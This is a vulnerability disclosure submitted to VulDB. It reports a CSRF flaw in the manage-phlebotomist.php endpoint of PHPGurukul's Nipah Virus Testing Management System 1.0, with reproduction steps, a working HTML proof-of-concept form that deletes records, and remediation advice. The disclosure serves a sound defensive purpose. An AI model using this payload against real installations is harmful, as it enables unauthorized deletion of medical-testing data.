| Titolo | PHPGurukul Nipah Virus Testing Management System 1.0 Cross Site Request Forgery |
|---|
| Descrizione | Hello there,
My name is Dhabaleshwar Das, a cyber security researcher. I recently found a CSRF vulnerability in Nipah virus (NiV) – Testing Management System. Here is the PoC below:
Bug Description:
A Cross Site Request Forgery (CSRF) vulnerability in "manage-phlebotomist.php" endpoint of PHPGurukul Nipah virus (NiV) – Testing Management System 1.0 allows attackers to delete phlebotomist via a crafted html request.
Steps to Reproduce:
# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Nipah virus (NiV) – Testing Management System
# Date: 02-12-2023
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE :
To reproduce the attack:
1- Head to the http://localhost/nipah-tms/manage-phlebotomist.php endpoint
2- Here you can see the phlebotomist name as "CSRF Test". We'll try to delete that using the HTML code we have written.
<html>
<!-- CSRF PoC - by Dhabaleshwar Das-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/nipah-tms/manage-phlebotomist.php">
<input type="hidden" name="pid" value="175" />
<input type="hidden" name="action" value="delete" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3- We'll then execute this HTML code and we successfully see that the record has been deleted successfully.
4- This shows that the endpoint "manage-phlebotomist.php" is vulnerable to CSRF attack.
5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.
Remediation:
1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate.
2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests.
|
|---|
| Fonte | ⚠️ https://github.com/dhabaleshwar/niv_testing_csrf/blob/main/exploit.md |
|---|
| Utente | dhabaleshwar (UID 58737) |
|---|
| Sottomissione | 02/12/2023 06:09 (3 anni fa) |
|---|
| Moderazione | 02/12/2023 08:34 (2 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 246640 [PHPGurukul Nipah Virus Testing Management System 1.0 manage-phlebotomist.php pid cross site request forgery] |
|---|
| Punti | 20 |
|---|